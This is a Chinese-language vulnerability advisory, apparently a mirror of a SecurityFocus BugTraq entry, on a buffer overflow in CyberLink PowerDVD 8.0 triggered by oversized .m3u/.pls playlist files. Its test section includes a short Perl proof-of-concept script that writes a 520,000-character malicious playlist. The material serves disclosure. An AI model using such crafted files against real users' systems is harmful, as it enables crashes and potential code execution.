BUGTRAQ ID: 30341
CNCAN ID：CNCAN-2008072307
 
漏洞消息时间:2008-07-22
 
漏洞起因
边界条件错误
 
影响系统
CyberLink PowerDVD 8.0
 
不受影响系统
 
危害
远程攻击者可以利用漏洞以应用程序权限执行任意指令。
 
攻击所需条件
攻击者必须构建恶意文件，诱使用户访问。
 
漏洞信息
PowerDVD是一款支持DVD播放的媒体程序。
PowerDVD处理'.m3u'/'.pls'文件存在缓冲区溢出，远程攻击者可以利用漏洞以应用程序权限执行任意指令。
构建恶意的'.m3u'/'.pls'文件，诱使用户访问，可触发此漏洞。
 
测试方法
#!/usr/bin/perl
#
# CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
# Coded by Gjoko "LiquidWorm" Krstic
# liquidworm [At] gmail.com
# http://www.zeroscience.org
#
 
$buffer = "J" x 520000;
open(m3u, ">./evil_list.m3u"); # or .pls
print m3u "$buffer";
print "\n--> Evil Playlist created... Have fun!\n";
# July, 2008
 
厂商解决方案
目前没有解决方案提供：
http://www.cyberlink.com/english/products/powerdvd/webpages/main_1_ENU_new.html
 
漏洞提供者
Gjoko 'LiquidWorm' Krstic
 
漏洞消息链接
http://www.securityfocus.com/bid/30341
 
漏洞消息标题
PowerDVD '.m3u' and '.pls' File Multiple Buffer Overflow Vulnerabilities